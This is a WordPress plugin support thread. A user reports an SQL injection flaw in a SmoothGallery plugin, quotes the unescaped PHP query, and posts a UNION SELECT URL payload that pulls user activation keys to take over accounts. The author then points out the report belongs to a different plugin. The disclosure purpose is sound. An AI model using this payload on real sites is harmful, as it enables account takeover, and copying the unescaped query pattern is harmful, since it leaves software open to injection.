Bad programmed plugin with vulnerabilities

  • This plugin was responsable for my blogs getting hacked as they use highly vulnerable code in this plugin.

    There is no protection against SQL injection in the plugin functions. Request parameters are added happily to some SQL query without escaping them; in the following example $galleryID is a simply copy of $_REQUEST["galleryID"]:

    $pictures = $wpdb->get_results("SELECT t.*, tt.* FROM $wpdb->nggallery AS t INNER JOIN $wpdb->nggpictures AS tt ON t.gid = tt.galleryid WHERE t.gid = '$galleryID' AND tt.exclude != 1 ORDER BY tt.$ngg_options[galSort] $ngg_options[galSortDir] ");

    I recommend to not use this plugin at all. It was obviously developed by some programming beginner and should not be used on production site.

    Example: Set your own activation key for a user to reset the password to your own:

    nggSmoothFrame.php?galleryID=999999.9'+union+all+select+0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,
(select+concat(0x7e,0x27,wp_users.user_activation_key,0x27,0x7e)+from+wp_users+Order+by+user_login+limit+5,1)+,0x31'

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author Christian Schenk

    (@chschenk)

    Hi Thomas,

    I think that you’ve submitted your rating to the wrong plugin. The above code, i.e. the references to “ngg”, seems to be part of the NextGen gallery plugin – maybe the SmoothGallery plugin for NextGen gallery itself – and I’m pretty sure that they will be happy to fix these issues if you hint them into the right direction.

    My plugin is a standalone plugin for SmoothGallery and I tried to avoid the above vulnerability. Maybe my plugin has got an issue as well – I’ll try fixing it as soon as something like this comes to my attention. So far, I haven’t had any security issues with the plugin. If you find something problematic in the code please let me know.

    Kind regards,
    Christian

    Thread Starter Thomas Heuer

    (@thomas-heuer)

    I’m so sorry. You are right. How many plugins called “Smooth Gallery” are out there?

    Now I posted that same comment to the real plugin’s author page:
    https://uninuni.com/wordpress-plugin-nextgen-smooth-gallery/

    I would like to delete this comment here, but can’t find out how to accomplish that.

    Plugin Author Christian Schenk

    (@chschenk)

    Hi Thomas,

    no problem, I know that it can be quite confusing regarding the variety of plugins for SmoothGallery. I’m aware of my plugin for SmoothGallery, the SmoothGallery plugin for the NextGen gallery plugin (the uninuni.com guys) and a few other plugins that simply replace WP’s standard gallery with a SmoothGallery or similar.

    Even if you can’t remove the negative rating at least you supplied a comment ?? It’s much better than just negative feedback without a single hint.

    Regards,
    Christian

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Bad programmed plugin with vulnerabilities’ is closed to new replies.